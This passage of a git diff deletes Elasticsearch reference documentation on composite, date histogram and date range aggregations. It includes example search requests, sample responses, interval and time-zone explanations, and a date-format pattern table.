-<2> ... in ascending order for the `username` field and in descending order for the `timestamp` field. - -.. could be used to optimize these composite aggregations: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "user_name": { "terms": { "field": "user_name" } } } <1> - ] - } - } - } -} --------------------------------------------------- - -<1> `user_name` is a prefix of the index sort and the order matches (`asc`). - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "user_name": { "terms": { "field": "user_name" } } }, <1> - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } } <2> - ] - } - } - } -} --------------------------------------------------- - -<1> `user_name` is a prefix of the index sort and the order matches (`asc`). -<2> `timestamp` matches also the prefix and the order matches (`desc`). - -In order to optimize the early termination it is advised to set `track_total_hits` in the request -to `false`. The number of total hits that match the request can be retrieved on the first request -and it would be costly to compute this number on every page: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "track_total_hits": false, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "user_name": { "terms": { "field": "user_name" } } }, - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } } - ] - } - } - } -} --------------------------------------------------- - -Note that the order of the source is important, in the example below switching the `user_name` with the `timestamp` -would deactivate the sort optimization since this configuration wouldn't match the index sort specification. -If the order of sources do not matter for your use case you can follow these simple guidelines: - - * Put the fields with the highest cardinality first. - * Make sure that the order of the field matches the order of the index sort. - * Put multi-valued fields last since they cannot be used for early termination. - -WARNING: <> can slowdown indexing, it is very important to test index sorting -with your specific use case and dataset to ensure that it matches your requirement. If it doesn't note that `composite` -aggregations will also try to early terminate on non-sorted indices if the query matches all document (`match_all` query). - -==== Sub-aggregations - -Like any `multi-bucket` aggregations the `composite` aggregation can hold sub-aggregations. -These sub-aggregations can be used to compute other buckets or statistics on each composite bucket created by this -parent aggregation. -For instance the following example computes the average value of a field -per composite bucket: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } }, - { "product": { "terms": { "field": "product" } } } - ] - }, - "aggregations": { - "the_avg": { - "avg": { "field": "price" } - } - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -\... 
returns: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "my_buckets": { - "after_key": { - "date": 1494201600000, - "product": "rocky" - }, - "buckets": [ - { - "key": { - "date": 1494460800000, - "product": "apocalypse now" - }, - "doc_count": 1, - "the_avg": { - "value": 10.0 - } - }, - { - "key": { - "date": 1494374400000, - "product": "mad max" - }, - "doc_count": 1, - "the_avg": { - "value": 27.0 - } - }, - { - "key": { - "date": 1494288000000, - "product": "mad max" - }, - "doc_count": 2, - "the_avg": { - "value": 22.5 - } - }, - { - "key": { - "date": 1494201600000, - "product": "rocky" - }, - "doc_count": 1, - "the_avg": { - "value": 10.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -==== Pipeline aggregations - -The composite agg is not currently compatible with pipeline aggregations, nor does it make sense in most cases. -E.g. due to the paging nature of composite aggs, a single logical partition (one day for example) might be spread -over multiple pages. Since pipeline aggregations are purely post-processing on the final list of buckets, -running something like a derivative on a composite page could lead to inaccurate results as it is only taking into -account a "partial" result on that page. - -Pipeline aggs that are self contained to a single bucket (such as `bucket_selector`) might be supported in the future. diff --git a/docs/reference/aggregations/bucket/datehistogram-aggregation.asciidoc b/docs/reference/aggregations/bucket/datehistogram-aggregation.asciidoc deleted file mode 100644 index 707f5251cb2..00000000000 --- a/docs/reference/aggregations/bucket/datehistogram-aggregation.asciidoc +++ /dev/null @@ -1,724 +0,0 @@ -[[search-aggregations-bucket-datehistogram-aggregation]] -=== Date histogram aggregation -++++ -Date histogram -++++ - -This multi-bucket aggregation is similar to the normal -<>, but it can -only be used with date or date range values. Because dates are represented internally in -Elasticsearch as long values, it is possible, but not as accurate, to use the -normal `histogram` on dates as well. The main difference in the two APIs is -that here the interval can be specified using date/time expressions. Time-based -data requires special support because time-based intervals are not always a -fixed length. - -Like the histogram, values are rounded *down* into the closest bucket. For -example, if the interval is a calendar day, `2020-01-03T07:00:01Z` is rounded to -`2020-01-03T00:00:00Z`. Values are rounded as follows: - -[source,java] ----- -bucket_key = Math.floor(value / interval) * interval ----- - -[[calendar_and_fixed_intervals]] -==== Calendar and fixed intervals - -When configuring a date histogram aggregation, the interval can be specified -in two manners: calendar-aware time intervals, and fixed time intervals. - -Calendar-aware intervals understand that daylight savings changes the length -of specific days, months have different amounts of days, and leap seconds can -be tacked onto a particular year. - -Fixed intervals are, by contrast, always multiples of SI units and do not change -based on calendaring context. - -[NOTE] -.Combined `interval` field is deprecated -================================== -deprecated[7.2, `interval` field is deprecated] Historically both calendar and fixed -intervals were configured in a single `interval` field, which led to confusing -semantics. 
Specifying `1d` would be assumed as a calendar-aware time, -whereas `2d` would be interpreted as fixed time. To get "one day" of fixed time, -the user would need to specify the next smaller unit (in this case, `24h`). - -This combined behavior was often unknown to users, and even when knowledgeable about -the behavior it was difficult to use and confusing. - -This behavior has been deprecated in favor of two new, explicit fields: `calendar_interval` -and `fixed_interval`. - -By forcing a choice between calendar and intervals up front, the semantics of the interval -are clear to the user immediately and there is no ambiguity. The old `interval` field -will be removed in the future. -================================== - -[[calendar_intervals]] -==== Calendar intervals - -Calendar-aware intervals are configured with the `calendar_interval` parameter. -You can specify calendar intervals using the unit name, such as `month`, or as a -single unit quantity, such as `1M`. For example, `day` and `1d` are equivalent. -Multiple quantities, such as `2d`, are not supported. - -The accepted calendar intervals are: - -`minute`, `1m` :: - -All minutes begin at 00 seconds. -One minute is the interval between 00 seconds of the first minute and 00 -seconds of the following minute in the specified time zone, compensating for any -intervening leap seconds, so that the number of minutes and seconds past the -hour is the same at the start and end. - -`hour`, `1h` :: - -All hours begin at 00 minutes and 00 seconds. -One hour (1h) is the interval between 00:00 minutes of the first hour and 00:00 -minutes of the following hour in the specified time zone, compensating for any -intervening leap seconds, so that the number of minutes and seconds past the hour -is the same at the start and end. - -`day`, `1d` :: - -All days begin at the earliest possible time, which is usually 00:00:00 -(midnight). -One day (1d) is the interval between the start of the day and the start of -of the following day in the specified time zone, compensating for any intervening -time changes. - -`week`, `1w` :: - -One week is the interval between the start day_of_week:hour:minute:second -and the same day of the week and time of the following week in the specified -time zone. - -`month`, `1M` :: - -One month is the interval between the start day of the month and time of -day and the same day of the month and time of the following month in the specified -time zone, so that the day of the month and time of day are the same at the start -and end. - -`quarter`, `1q` :: - -One quarter is the interval between the start day of the month and -time of day and the same day of the month and time of day three months later, -so that the day of the month and time of day are the same at the start and end. + - -`year`, `1y` :: - -One year is the interval between the start day of the month and time of -day and the same day of the month and time of day the following year in the -specified time zone, so that the date and time are the same at the start and end. 
+ - -[[calendar_interval_examples]] -===== Calendar interval examples -As an example, here is an aggregation requesting bucket intervals of a month in calendar time: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -If you attempt to use multiples of calendar units, the aggregation will fail because only -singular calendar units are supported: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "calendar_interval": "2d" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[catch:bad_request] - -[source,js] --------------------------------------------------- -{ - "error" : { - "root_cause" : [...], - "type" : "x_content_parse_exception", - "reason" : "[1:82] [date_histogram] failed to parse field [calendar_interval]", - "caused_by" : { - "type" : "illegal_argument_exception", - "reason" : "The supplied interval [2d] could not be parsed as a calendar interval.", - "stack_trace" : "java.lang.IllegalArgumentException: The supplied interval [2d] could not be parsed as a calendar interval." - } - } -} - --------------------------------------------------- -// NOTCONSOLE - -[[fixed_intervals]] -==== Fixed intervals - -Fixed intervals are configured with the `fixed_interval` parameter. - -In contrast to calendar-aware intervals, fixed intervals are a fixed number of SI -units and never deviate, regardless of where they fall on the calendar. One second -is always composed of `1000ms`. This allows fixed intervals to be specified in -any multiple of the supported units. - -However, it means fixed intervals cannot express other units such as months, -since the duration of a month is not a fixed quantity. Attempting to specify -a calendar interval like month or quarter will throw an exception. - -The accepted units for fixed intervals are: - -milliseconds (`ms`) :: -A single millisecond. This is a very, very small interval. - -seconds (`s`) :: -Defined as 1000 milliseconds each. - -minutes (`m`) :: -Defined as 60 seconds each (60,000 milliseconds). -All minutes begin at 00 seconds. - -hours (`h`) :: -Defined as 60 minutes each (3,600,000 milliseconds). -All hours begin at 00 minutes and 00 seconds. - -days (`d`) :: -Defined as 24 hours (86,400,000 milliseconds). -All days begin at the earliest possible time, which is usually 00:00:00 -(midnight). 
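Because any multiple of these units is accepted, intervals that would otherwise be fractional can be expressed by dropping to a smaller unit. The sketch below, which reuses the `sales` example index assumed elsewhere on this page, buckets by 90 minutes instead of the unsupported `1.5h`:

[source,console]
----
POST /sales/_search?size=0
{
  "aggs": {
    "sales_over_time": {
      "date_histogram": {
        "field": "date",
        "fixed_interval": "90m"
      }
    }
  }
}
----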
- -[[fixed_interval_examples]] -===== Fixed interval examples - -If we try to recreate the "month" `calendar_interval` from earlier, we can approximate that with -30 fixed days: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "fixed_interval": "30d" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -But if we try to use a calendar unit that is not supported, such as weeks, we'll get an exception: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "fixed_interval": "2w" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[catch:bad_request] - -[source,js] --------------------------------------------------- -{ - "error" : { - "root_cause" : [...], - "type" : "x_content_parse_exception", - "reason" : "[1:82] [date_histogram] failed to parse field [fixed_interval]", - "caused_by" : { - "type" : "illegal_argument_exception", - "reason" : "failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized", - "stack_trace" : "java.lang.IllegalArgumentException: failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized" - } - } -} - --------------------------------------------------- -// NOTCONSOLE - -[[datehistogram-aggregation-notes]] -==== Date histogram usage notes - -In all cases, when the specified end time does not exist, the actual end time is -the closest available time after the specified end. - -Widely distributed applications must also consider vagaries such as countries that -start and stop daylight savings time at 12:01 A.M., so end up with one minute of -Sunday followed by an additional 59 minutes of Saturday once a year, and countries -that decide to move across the international date line. Situations like -that can make irregular time zone offsets seem easy. - -As always, rigorous testing, especially around time-change events, will ensure -that your time interval specification is -what you intend it to be. - -WARNING: To avoid unexpected results, all connected servers and clients must -sync to a reliable network time service. - -NOTE: Fractional time values are not supported, but you can address this by -shifting to another time unit (e.g., `1.5h` could instead be specified as `90m`). - -NOTE: You can also specify time values using abbreviations supported by -<> parsing. - -[[datehistogram-aggregation-keys]] -==== Keys - -Internally, a date is represented as a 64 bit number representing a timestamp -in milliseconds-since-the-epoch (01/01/1970 midnight UTC). These timestamps are -returned as the ++key++ name of the bucket. The `key_as_string` is the same -timestamp converted to a formatted -date string using the `format` parameter specification: - -TIP: If you don't specify `format`, the first date -<> specified in the field mapping is used. 
- -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M", - "format": "yyyy-MM-dd" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Supports expressive date <> - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "sales_over_time": { - "buckets": [ - { - "key_as_string": "2015-01-01", - "key": 1420070400000, - "doc_count": 3 - }, - { - "key_as_string": "2015-02-01", - "key": 1422748800000, - "doc_count": 2 - }, - { - "key_as_string": "2015-03-01", - "key": 1425168000000, - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -[[datehistogram-aggregation-time-zone]] -==== Time zone - -{es} stores date-times in Coordinated Universal Time (UTC). By default, all bucketing and -rounding is also done in UTC. Use the `time_zone` parameter to indicate -that bucketing should use a different time zone. - -For example, if the interval is a calendar day and the time zone is -`America/New_York` then `2020-01-03T01:00:01Z` is : -# Converted to `2020-01-02T18:00:01` -# Rounded down to `2020-01-02T00:00:00` -# Then converted back to UTC to produce `2020-01-02T05:00:00:00Z` -# Finally, when the bucket is turned into a string key it is printed in - `America/New_York` so it'll display as `"2020-01-02T00:00:00"`. - -It looks like: - -[source,java] ----- -bucket_key = localToUtc(Math.floor(utcToLocal(value) / interval) * interval)) ----- - -You can specify time zones as an ISO 8601 UTC offset (e.g. `+01:00` or -`-08:00`) or as an IANA time zone ID, -such as `America/Los_Angeles`. - -Consider the following example: - -[source,console] ---------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "date": "2015-10-01T00:30:00Z" -} - -PUT my-index-000001/_doc/2?refresh -{ - "date": "2015-10-01T01:30:00Z" -} - -GET my-index-000001/_search?size=0 -{ - "aggs": { - "by_day": { - "date_histogram": { - "field": "date", - "calendar_interval": "day" - } - } - } -} ---------------------------------- - -If you don't specify a time zone, UTC is used. This would result in both of these -documents being placed into the same day bucket, which starts at midnight UTC -on 1 October 2015: - -[source,console-result] ---------------------------------- -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-10-01T00:00:00.000Z", - "key": 1443657600000, - "doc_count": 2 - } - ] - } - } -} ---------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -If you specify a `time_zone` of `-01:00`, midnight in that time zone is one hour -before midnight UTC: - -[source,console] ---------------------------------- -GET my-index-000001/_search?size=0 -{ - "aggs": { - "by_day": { - "date_histogram": { - "field": "date", - "calendar_interval": "day", - "time_zone": "-01:00" - } - } - } -} ---------------------------------- -// TEST[continued] - -Now the first document falls into the bucket for 30 September 2015, while the -second document falls into the bucket for 1 October 2015: - -[source,console-result] ---------------------------------- -{ - ... 
- "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-09-30T00:00:00.000-01:00", <1> - "key": 1443574800000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T00:00:00.000-01:00", <1> - "key": 1443661200000, - "doc_count": 1 - } - ] - } - } -} ---------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -<1> The `key_as_string` value represents midnight on each day - in the specified time zone. - -WARNING: Many time zones shift their clocks for daylight savings time. Buckets -close to the moment when those changes happen can have slightly different sizes -than you would expect from the `calendar_interval` or `fixed_interval`. -For example, consider a DST start in the `CET` time zone: on 27 March 2016 at 2am, -clocks were turned forward 1 hour to 3am local time. If you use `day` as the -`calendar_interval`, the bucket covering that day will only hold data for 23 -hours instead of the usual 24 hours for other buckets. The same is true for -shorter intervals, like a `fixed_interval` of `12h`, where you'll have only a 11h -bucket on the morning of 27 March when the DST shift happens. - -[[search-aggregations-bucket-datehistogram-offset]] -==== Offset - -// tag::offset-explanation[] -Use the `offset` parameter to change the start value of each bucket by the -specified positive (`+`) or negative offset (`-`) duration, such as `1h` for -an hour, or `1d` for a day. See <> for more possible time -duration options. - -For example, when using an interval of `day`, each bucket runs from midnight -to midnight. Setting the `offset` parameter to `+6h` changes each bucket -to run from 6am to 6am: -// end::offset-explanation[] - -[source,console] ------------------------------ -PUT my-index-000001/_doc/1?refresh -{ - "date": "2015-10-01T05:30:00Z" -} - -PUT my-index-000001/_doc/2?refresh -{ - "date": "2015-10-01T06:30:00Z" -} - -GET my-index-000001/_search?size=0 -{ - "aggs": { - "by_day": { - "date_histogram": { - "field": "date", - "calendar_interval": "day", - "offset": "+6h" - } - } - } -} ------------------------------ - -// tag::offset-result-intro[] -Instead of a single bucket starting at midnight, the above request groups the -documents into buckets starting at 6am: -// end::offset-result-intro[] - -[source,console-result] ------------------------------ -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-09-30T06:00:00.000Z", - "key": 1443592800000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T06:00:00.000Z", - "key": 1443679200000, - "doc_count": 1 - } - ] - } - } -} ------------------------------ -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -// tag::offset-note[] -NOTE: The start `offset` of each bucket is calculated after `time_zone` -adjustments have been made. 
-// end::offset-note[] - -[[date-histogram-keyed-response]] -==== Keyed Response - -Setting the `keyed` flag to `true` associates a unique string key with each -bucket and returns the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M", - "format": "yyyy-MM-dd", - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "sales_over_time": { - "buckets": { - "2015-01-01": { - "key_as_string": "2015-01-01", - "key": 1420070400000, - "doc_count": 3 - }, - "2015-02-01": { - "key_as_string": "2015-02-01", - "key": 1422748800000, - "doc_count": 2 - }, - "2015-03-01": { - "key_as_string": "2015-03-01", - "key": 1425168000000, - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -[[date-histogram-scripts]] -==== Scripts - -As with the normal <>, -both document-level scripts and -value-level scripts are supported. You can control the order of the returned -buckets using the `order` -settings and filter the returned buckets based on a `min_doc_count` setting -(by default all buckets between the first -bucket that matches documents and the last one are returned). This histogram -also supports the `extended_bounds` -setting, which enables extending the bounds of the histogram beyond the data -itself, and `hard_bounds` that limits the histogram to specified bounds. -For more information, see -<> and -<>. - -[[date-histogram-missing-value]] -===== Missing value - -The `missing` parameter defines how to treat documents that are missing a value. -By default, they are ignored, but it is also possible to treat them as if they -have a value. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sale_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "year", - "missing": "2000/01/01" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `publish_date` field will fall into the -same bucket as documents that have the value `2000-01-01`. - -[[date-histogram-order]] -===== Order - -By default the returned buckets are sorted by their `key` ascending, but you can -control the order using -the `order` setting. This setting supports the same `order` functionality as -<>. - -[[date-histogram-aggregate-scripts]] -===== Using a script to aggregate by day of the week - -When you need to aggregate the results by day of the week, use a script that -returns the day of the week: - -[source,console,id=datehistogram-aggregation-script-example] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "dayOfWeek": { - "terms": { - "script": { - "lang": "painless", - "source": "doc['date'].value.dayOfWeekEnum.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "dayOfWeek": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "7", - "doc_count": 4 - }, - { - "key": "4", - "doc_count": 3 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The response will contain all the buckets having the relative day of -the week as key : 1 for Monday, 2 for Tuesday... 7 for Sunday. diff --git a/docs/reference/aggregations/bucket/daterange-aggregation.asciidoc b/docs/reference/aggregations/bucket/daterange-aggregation.asciidoc deleted file mode 100644 index 6228cfe7da3..00000000000 --- a/docs/reference/aggregations/bucket/daterange-aggregation.asciidoc +++ /dev/null @@ -1,402 +0,0 @@ -[[search-aggregations-bucket-daterange-aggregation]] -=== Date range aggregation -++++ -Date range -++++ - -A range aggregation that is dedicated for date values. The main difference -between this aggregation and the normal -<> -aggregation is that the `from` and `to` values can be expressed in -<> expressions, and it is also possible to specify a date -format by which the `from` and `to` response fields will be returned. -Note that this aggregation includes the `from` value and excludes the `to` value -for each range. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "format": "MM-yyyy", - "ranges": [ - { "to": "now-10M/M" }, <1> - { "from": "now-10M/M" } <2> - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales s/now-10M\/M/10-2015/] - -<1> < now minus 10 months, rounded down to the start of the month. -<2> >= now minus 10 months, rounded down to the start of the month. - -In the example above, we created two range buckets, the first will "bucket" all -documents dated prior to 10 months ago and the second will "bucket" all -documents dated since 10 months ago - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "range": { - "buckets": [ - { - "to": 1.4436576E12, - "to_as_string": "10-2015", - "doc_count": 7, - "key": "*-10-2015" - }, - { - "from": 1.4436576E12, - "from_as_string": "10-2015", - "doc_count": 0, - "key": "10-2015-*" - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -WARNING: If a format or date value is incomplete, the date range aggregation -replaces any missing components with default values. See -<>. - -==== Missing Values - -The `missing` parameter defines how documents that are missing a value should -be treated. By default they will be ignored but it is also possible to treat -them as if they had a value. This is done by adding a set of fieldname : -value mappings to specify default values per field. 
- -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "missing": "1976/11/30", - "ranges": [ - { - "key": "Older", - "to": "2016/02/01" - }, <1> - { - "key": "Newer", - "from": "2016/02/01", - "to" : "now/d" - } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `date` field will be added to the "Older" -bucket, as if they had a date value of "1976-11-30". - -[[date-format-pattern]] -==== Date Format/Pattern - -NOTE: this information was copied from -https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[DateTimeFormatter] - -All ASCII letters are reserved as format pattern letters, which are defined -as follows: - -[options="header"] -|======= -|Symbol |Meaning |Presentation |Examples -|G |era |text |AD; Anno Domini; A -|u |year |year |2004; 04 -|y |year-of-era |year |2004; 04 -|D |day-of-year |number |189 -|M/L |month-of-year |number/text |7; 07; Jul; July; J -|d |day-of-month |number |10 - -|Q/q |quarter-of-year |number/text |3; 03; Q3; 3rd quarter -|Y |week-based-year |year |1996; 96 -|w |week-of-week-based-year |number |27 -|W |week-of-month |number |4 -|E |day-of-week |text |Tue; Tuesday; T -|e/c |localized day-of-week |number/text |2; 02; Tue; Tuesday; T -|F |week-of-month |number |3 - -|a |am-pm-of-day |text |PM -|h |clock-hour-of-am-pm (1-12) |number |12 -|K |hour-of-am-pm (0-11) |number |0 -|k |clock-hour-of-am-pm (1-24) |number |0 - -|H |hour-of-day (0-23) |number |0 -|m |minute-of-hour |number |30 -|s |second-of-minute |number |55 -|S |fraction-of-second |fraction |978 -|A |milli-of-day |number |1234 -|n |nano-of-second |number |987654321 -|N |nano-of-day |number |1234000000 - -|V |time-zone ID |zone-id |America/Los_Angeles; Z; -08:30 -|z |time-zone name |zone-name |Pacific Standard Time; PST -|O |localized zone-offset |offset-O |GMT+8; GMT+08:00; UTC-08:00; -|X |zone-offset 'Z' for zero |offset-X |Z; -08; -0830; -08:30; -083015; -08:30:15; -|x |zone-offset |offset-x |+0000; -08; -0830; -08:30; -083015; -08:30:15; -|Z |zone-offset |offset-Z |+0000; -0800; -08:00; - -|p |pad next |pad modifier |1 -|' |escape for text |delimiter -|'' |single quote |literal |' -|[ |optional section start -|] |optional section end -|# |reserved for future use -|{ |reserved for future use -|} |reserved for future use -|======= - -The count of pattern letters determines the format. - -Text:: The text style is determined based on the number of pattern letters -used. Less than 4 pattern letters will use the short form. Exactly 4 -pattern letters will use the full form. Exactly 5 pattern letters will use -the narrow form. Pattern letters `L`, `c`, and `q` specify the stand-alone -form of the text styles. - -Number:: If the count of letters is one, then the value is output using -the minimum number of digits and without padding. Otherwise, the count of -digits is used as the width of the output field, with the value -zero-padded as necessary. The following pattern letters have constraints -on the count of letters. Only one letter of `c` and `F` can be specified. -Up to two letters of `d`, `H`, `h`, `K`, `k`, `m`, and `s` can be -specified. Up to three letters of `D` can be specified. - -Number/Text:: If the count of pattern letters is 3 or greater, use the -Text rules above. Otherwise use the Number rules above. - -Fraction:: Outputs the nano-of-second field as a fraction-of-second. 
The -nano-of-second value has nine digits, thus the count of pattern letters is -from 1 to 9. If it is less than 9, then the nano-of-second value is -truncated, with only the most significant digits being output. - -Year:: The count of letters determines the minimum field width below which -padding is used. If the count of letters is two, then a reduced two digit -form is used. For printing, this outputs the rightmost two digits. For -parsing, this will parse using the base value of 2000, resulting in a year -within the range 2000 to 2099 inclusive. If the count of letters is less -than four (but not two), then the sign is only output for negative years -as per `SignStyle.NORMAL`. Otherwise, the sign is output if the pad width is -exceeded, as per `SignStyle.EXCEEDS_PAD`. - -ZoneId:: This outputs the time-zone ID, such as `Europe/Paris`. If the -count of letters is two, then the time-zone ID is output. Any other count -of letters throws `IllegalArgumentException`. - -Zone names:: This outputs the display name of the time-zone ID. If the -count of letters is one, two or three, then the short name is output. If -the count of letters is four, then the full name is output. Five or more -letters throws `IllegalArgumentException`. - -Offset X and x:: This formats the offset based on the number of pattern -letters. One letter outputs just the hour, such as `+01`, unless the -minute is non-zero in which case the minute is also output, such as -`+0130`. Two letters outputs the hour and minute, without a colon, such as -`+0130`. Three letters outputs the hour and minute, with a colon, such as -`+01:30`. Four letters outputs the hour and minute and optional second, -without a colon, such as `+013015`. Five letters outputs the hour and -minute and optional second, with a colon, such as `+01:30:15`. Six or -more letters throws `IllegalArgumentException`. Pattern letter `X` (upper -case) will output `Z` when the offset to be output would be zero, -whereas pattern letter `x` (lower case) will output `+00`, `+0000`, or -`+00:00`. - -Offset O:: This formats the localized offset based on the number of -pattern letters. One letter outputs the short form of the localized -offset, which is localized offset text, such as `GMT`, with hour without -leading zero, optional 2-digit minute and second if non-zero, and colon, -for example `GMT+8`. Four letters outputs the full form, which is -localized offset text, such as `GMT, with 2-digit hour and minute -field, optional second field if non-zero, and colon, for example -`GMT+08:00`. Any other count of letters throws -`IllegalArgumentException`. - -Offset Z:: This formats the offset based on the number of pattern letters. -One, two or three letters outputs the hour and minute, without a colon, -such as `+0130`. The output will be `+0000` when the offset is zero. -Four letters outputs the full form of localized offset, equivalent to -four letters of Offset-O. The output will be the corresponding localized -offset text if the offset is zero. Five letters outputs the hour, -minute, with optional second if non-zero, with colon. It outputs `Z` if -the offset is zero. Six or more letters throws IllegalArgumentException. - -Optional section:: The optional section markers work exactly like calling -`DateTimeFormatterBuilder.optionalStart()` and -`DateTimeFormatterBuilder.optionalEnd()`. - -Pad modifier:: Modifies the pattern that immediately follows to be padded -with spaces. The pad width is determined by the number of pattern letters. 
-This is the same as calling `DateTimeFormatterBuilder.padNext(int)`. - -For example, `ppH` outputs the hour-of-day padded on the left with spaces to a width of 2. - -Any unrecognized letter is an error. Any non-letter character, other than -`[`, `]`, `{`, `}`, `#` and the single quote will be output directly. -Despite this, it is recommended to use single quotes around all characters -that you want to output directly to ensure that future changes do not -break your application. - - -[[time-zones]] -==== Time zone in date range aggregations - -Dates can be converted from another time zone to UTC by specifying the -`time_zone` parameter. - -Time zones may either be specified as an ISO 8601 UTC offset (e.g. +01:00 or --08:00) or as one of the time zone ids from the TZ database. - -The `time_zone` parameter is also applied to rounding in date math expressions. -As an example, to round to the beginning of the day in the CET time zone, you -can do the following: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "time_zone": "CET", - "ranges": [ - { "to": "2016/02/01" }, <1> - { "from": "2016/02/01", "to" : "now/d" }, <2> - { "from": "now/d" } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> This date will be converted to `2016-02-01T00:00:00.000+01:00`. -<2> `now/d` will be rounded to the beginning of the day in the CET time zone. - -==== Keyed Response - -Setting the `keyed` flag to `true` will associate a unique string key with each -bucket and return the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "format": "MM-yyy", - "ranges": [ - { "to": "now-10M/M" }, - { "from": "now-10M/M" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:sales s/now-10M\/M/10-2015/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "range": { - "buckets": { - "*-10-2015": { - "to": 1.4436576E12, - "to_as_string": "10-2015", - "doc_count": 7 - }, - "10-2015-*": { - "from": 1.4436576E12, - "from_as_string": "10-2015", - "doc_count": 0 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -It is also possible to customize the key for each range: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "format": "MM-yyy", - "ranges": [ - { "from": "01-2015", "to": "03-2015", "key": "quarter_01" }, - { "from": "03-2015", "to": "06-2015", "key": "quarter_02" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - 